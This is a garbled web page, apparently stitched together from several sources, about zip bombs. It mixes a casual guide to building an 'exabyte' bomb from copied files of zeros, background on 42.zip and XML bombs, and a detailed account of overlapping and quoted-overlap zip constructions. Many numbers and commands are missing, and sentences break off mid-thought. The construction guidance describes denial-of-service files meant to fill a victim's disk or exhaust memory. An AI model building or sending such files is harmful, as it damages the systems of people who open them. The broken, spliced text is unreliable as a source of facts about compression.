Thus we need to find the most efficient one among them! If we have a look at the size of resultant compressed files you would find the following ls command :. Now that we have a very efficient method of creating zip files, we can create our zip bomb.
This compresses TB of data into a file of approximately Thus when someone tries to extract it, it should expand to more than x times its size and their hard drive should be filled will null characters! No discussion on zip bombs is complete without the infamous It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4. The The principal of zip bombs extends to many other areas.
Basically it crashes a web browser by causing the XML parser to run out of memory. Most web browsers today defend against this by capping the memory allocated to the parser.
We are going to build an exabyte zip bomb. Say you make an initial text file around 10MB worth of zeros. Save it and close your text editor.
Go to the folder where your text file is stored, make around ten copies of the text file in the same folder. Now open up a command prompt where your text file is stored and type:. What this does is combine all the copies of the text files into one. Better still, it can do this quickly without any lag. Text editors freeze up because of having to deal with the user interface.
Using the command line, everything happens as a background process without a hiccup. Combining ten files of 10MB will yield one MB file, combine ten copies of that and you have a 1GB text file full of zeros in just a few seconds. In a standard text file, every character needs 1 byte 8 bits of storage.
So now that we have packed a ridiculous amount of data into one tiny file, what can be done with it? Is it just a quirky trick, interesting but useless? Yes and no. You could choose to fully unpack an archive that you knew had more archives within it.
The zip bomb was actually a bomb for these applications. Even today, most common storage devices like the hard disk in your computer are pretty slow. So, it would take a good long while to write a large amount of data to the storage device.
Anyone slowly unpacking a zip bomb would quickly notice this and simply stop the process, defusing our bomb. In the same vein, most modern anti-virus programs can detect whether a file is a zip bomb and avoid unpacking it.
In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time.
Zip bombs often if not always rely on repetition of identical files to achieve their extreme compression ratios. Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of with each layer.
But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, Zip quines, like those of Ellingsen and Cox , which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once. It works by overlapping files inside the zip container, in order to reference a "kernel" of highly compressed data in multiple files, without making multiple copies of it.
The zip bomb's output size grows quadratically in the input size; i. The construction depends on features of both zip and DEFLATE—it is not directly portable to other file formats or compression algorithms. It is compatible with most zip parsers, the exceptions being "streaming" parsers that parse in one pass without first consulting the zip file's central directory.
We try to balance two conflicting goals:. The central directory is at the end of the zip file. It is a list of central directory headers. Each central directory header contains metadata for a single file, like its filename and CRC checksum, and a backwards pointer to a local file header.
A central directory header is 46 bytes long, plus the length of the filename. A file consists of a local file header followed by compressed file data. The local file header is 30 bytes long, plus the length of the filename.
It contains a redundant copy of the metadata from the central directory header, and the compressed and uncompressed sizes of the file data that follows. Zip is a container format, not a compression algorithm. This description of the zip format omits many details that are not needed for understanding the zip bomb. For full information, refer to section 4. By compressing a long string of repeated bytes, we can produce a kernel of highly compressed data. By itself, the kernel's compression ratio cannot exceed the DEFLATE limit of , so we want a way to reuse the kernel in many files, without making a separate copy of it in each file.
We can do it by overlapping files: making many central directory headers point to a single file, whose data is the kernel. Let's look at an example to see how this construction affects the compression ratio.
Suppose the kernel is bytes and decompresses to 1 MB. Then the first MB of output "costs" bytes of input:. But every 1 MB of output after the first costs only 47 bytes —we don't need another local file header or another copy of the kernel, only an additional central directory header. A bigger kernel raises the ceiling.
The problem with this idea is a lack of compatibility. Because many central directory headers point to a single local file header, the metadata—specifically the filename—cannot match for every file. Some parsers balk at that. And the Python zipfile module throws an exception :. Next we will see how to modify the construction for consistency of filenames, while still retaining most of the advantage of overlapping files.
We need to separate the local file headers for each file, while still reusing a single kernel. Simply concatenating all the local file headers does not work, because the zip parser will find a local file header where it expects to find the beginning of a DEFLATE stream.
But the idea will work, with a minor modification. Every local file header except the first will be interpreted in two ways: as code part of the structure of the zip file and as data part of the contents of a file. Compressed blocks are what we usually think of; for example the kernel is one big compressed block. But there are also non-compressed blocks, which start with a 5-byte header with a length field that means simply, "output the next n bytes verbatim.
The output is the concatenation of decompressing all the blocks in order. The "non-compressed" notion only has meaning at the DEFLATE layer; the file data still counts as "compressed" at the zip layer, no matter what kind of blocks are used. It is easiest to understand this quoted-overlap construction from the inside out, beginning with the last file and working backwards to the first. Start by inserting the kernel, which will form the end of file data for every file.
Now prepend a 5-byte non-compressed block header colored green in the diagram whose length field is equal to the size of LFH N. Set the "compressed size" metadata field in both of the new headers to the compressed size of the kernel plus the size of the non-compressed block header 5 bytes plus the size of LFH N. At this point the zip file contains two files, named "Y" and "Z".
Let's walk through what a zip parser would see while parsing it. Suppose the compressed size of the kernel is bytes and the size of LFH N is 31 bytes. The first file's filename is "Y" and the compressed size of its file data is bytes. Interpreting the next bytes as a DEFLATE stream, we first encounter the 5-byte header of a non-compressed block that says to copy the next 31 bytes.
Now we have reached the end of the compressed data and are done with file "Y". Now we have reached the end of the final file and are done. The output file "Z" contains the decompressed kernel; the output file "Y" is the same, but additionally prefixed by the 31 bytes of LFH N. We complete the construction by repeating the quoting procedure until the zip file contains the desired number of files.
Each new file adds a central directory header, a local file header, and a non-compressed block to quote the immediately succeeding local file header. Compressed file data is generally a chain of DEFLATE non-compressed blocks the quoted local file headers followed by the compressed kernel. The output files are not all the same size: those that appear earlier in the zip file are larger than those that appear later, because they contain more quoted local file headers.
The contents of the output files are not particularly meaningful, but no one said they had to make sense. This quoted-overlap construction has better compatibility than the full-overlap construction of the previous section, but the compatibility comes at the expense of the compression ratio. There, each added file cost only a central directory header; here, it costs a central directory header, a local file header, and another 5 bytes for the quoting header.
Now that we have the basic zip bomb construction, we will try to make it as efficient as possible. We want to answer two questions:. It pays to compress the kernel as densely as possible, because every decompressed byte gets magnified by a factor of N. All decent DEFLATE compressors will approach a compression ratio of when given an infinite stream of repeating bytes, but we care more about specific finite sizes than asymptotics.
For our purposes, filenames are mostly dead weight. While filenames do contribute something to the output size by virtue of being part of quoted local file headers, a byte in a filename does not contribute nearly as much as a byte in the kernel. We want filenames to be as short as possible, while keeping them all distinct, and subject to compatibility considerations.
The first compatibility consideration is character encoding. TXT Appendix D. But this is a major point of incompatibility across zip parsers, which may interpret filenames as being in some fixed or locale-specific encoding. We are further restricted by filesystem naming limitations. Some filesystems are case-insensitive, so "a" and "A" do not count as distinct names. As a safe but not necessarily optimal compromise, our zip bomb will use filenames consisting of characters drawn from a character alphabet that does not rely on case distinctions or use special characters:.
Filenames are generated in the obvious way, cycling each position through the possible characters and adding a position on overflow:. There are 36 filenames of length 1, 36 2 filenames of length 2, and so on. Given that the N filenames in the zip file are generally not all of the same length, which way should we order them, shortest to longest or longest to shortest?
A little reflection shows that it is better to put the longest names last, because those names are the most quoted. Ordering filenames longest last adds over MB of output to zblg. It is a minor optimization, though, as those MB comprise only 0.
The quoted-overlap construction allows us to place a compressed kernel of data, and then cheaply copy it many times. For a given zip file size X , how much space should we devote to storing the kernel, and how much to making copies?
0コメント